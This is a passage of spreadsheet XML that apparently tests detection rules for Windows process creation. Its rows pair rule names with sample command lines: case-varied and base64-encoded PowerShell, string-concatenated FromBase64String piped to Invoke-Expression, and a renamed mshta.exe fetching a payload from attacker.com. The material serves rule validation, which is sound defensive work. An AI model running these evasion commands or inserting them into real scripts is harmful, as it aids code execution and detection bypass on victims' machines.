      <c r="I3152" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3153" ht="15.75" customHeight="1" s="42">
      <c r="A3153" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3153" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3153" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3153" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDedCoMMand QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F3153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3153" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3154" ht="15.75" customHeight="1" s="42">
      <c r="A3154" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3154" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3154" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3154" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F3154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3154" s="44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3154" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3155" ht="15.75" customHeight="1" s="42">
      <c r="A3155" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B3155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3155" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3155" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3155" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F3155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3155" s="44" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J3155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3156" ht="15.75" customHeight="1" s="42">
      <c r="A3156" s="43" t="n"/>
      <c r="B3156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3156" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3156" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F3156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3156" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3157" ht="15.75" customHeight="1" s="42">
      <c r="A3157" s="43" t="n"/>
      <c r="B3157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3157" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3157" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F3157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3157" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3158" ht="15.75" customHeight="1" s="42">
      <c r="A3158" s="43" t="n"/>
      <c r="B3158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3158" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3158" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3158" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F3158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3158" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3159" ht="15.75" customHeight="1" s="42">
      <c r="A3159" s="43" t="n"/>
      <c r="B3159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3159" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3159" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3159" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F3159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3159" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3160" ht="15.75" customHeight="1" s="42">
      <c r="A3160" s="43" t="n"/>
      <c r="B3160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3160" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3160" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3160" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F3160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3160" s="43" t="n"/>
      <c r="J3160" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3160" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3161" ht="15.75" customHeight="1" s="42">
      <c r="A3161" s="43" t="n"/>
      <c r="B3161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3161" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3161" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3161" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F3161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3161" s="43" t="n"/>
      <c r="J3161" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3161" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3162" ht="15.75" customHeight="1" s="42">
      <c r="A3162" s="43" t="n"/>
      <c r="B3162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3162" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3162" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3162" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F3162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3162" s="43" t="n"/>
      <c r="J3162" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3162" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3163" ht="15.75" customHeight="1" s="42">
      <c r="A3163" s="43" t="n"/>
      <c r="B3163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3163" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3163" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3163" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3163" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3163" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3164" ht="15.75" customHeight="1" s="42">
      <c r="A3164" s="43" t="n"/>
      <c r="B3164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3164" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3164" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3164" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3164" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3164" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3165" ht="15.75" customHeight="1" s="42">
      <c r="A3165" s="43" t="n"/>
      <c r="B3165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3165" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3165" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3165" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3165" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3165" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3166" ht="15.75" customHeight="1" s="42">
      <c r="A3166" s="43" t="n"/>
      <c r="B3166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3166" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3166" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3166" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnD "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3166" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3166" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3166" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3167" ht="15.75" customHeight="1" s="42">
      <c r="A3167" s="43" t="n"/>
      <c r="B3167" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3167" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3167" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3167" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3167" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3167" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3167" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3167" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3168" ht="15.75" customHeight="1" s="42">
      <c r="A3168" s="43" t="n"/>
      <c r="B3168" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3168" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3168" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3168" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F3168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3168" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3168" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3168" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3169" ht="15.75" customHeight="1" s="42">
      <c r="A3169" s="44" t="n"/>
      <c r="B3169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3169" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3169" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3169" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3169" s="43" t="n"/>
      <c r="J3169" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3169" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3170" ht="15.75" customHeight="1" s="42">
      <c r="A3170" s="43" t="n"/>
      <c r="B3170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3170" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3170" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3170" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3170" s="43" t="n"/>
      <c r="J3170" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3170" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3171" ht="15.75" customHeight="1" s="42">
      <c r="A3171" s="43" t="n"/>
      <c r="B3171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3171" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3171" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3171" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3171" s="44" t="n"/>
      <c r="J3171" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3171" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3172" ht="15.75" customHeight="1" s="42">
      <c r="A3172" s="43" t="n"/>
      <c r="B3172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3172" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3172" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3172" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3172" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3173" ht="15.75" customHeight="1" s="42">
      <c r="A3173" s="43" t="n"/>
      <c r="B3173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3173" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3173" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3173" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3173" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3173" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3174" ht="15.75" customHeight="1" s="42">
      <c r="A3174" s="43" t="n"/>
      <c r="B3174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3174" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3174" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3174" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3174" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3175" ht="15.75" customHeight="1" s="42">
      <c r="A3175" s="43" t="n"/>
      <c r="B3175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3175" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3175" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3175" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3175" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3175" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3175" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3176" ht="15.75" customHeight="1" s="42">
      <c r="A3176" s="43" t="n"/>
      <c r="B3176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3176" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3176" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3176" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3176" s="44" t="b">
        <v>1</v>
      </c>
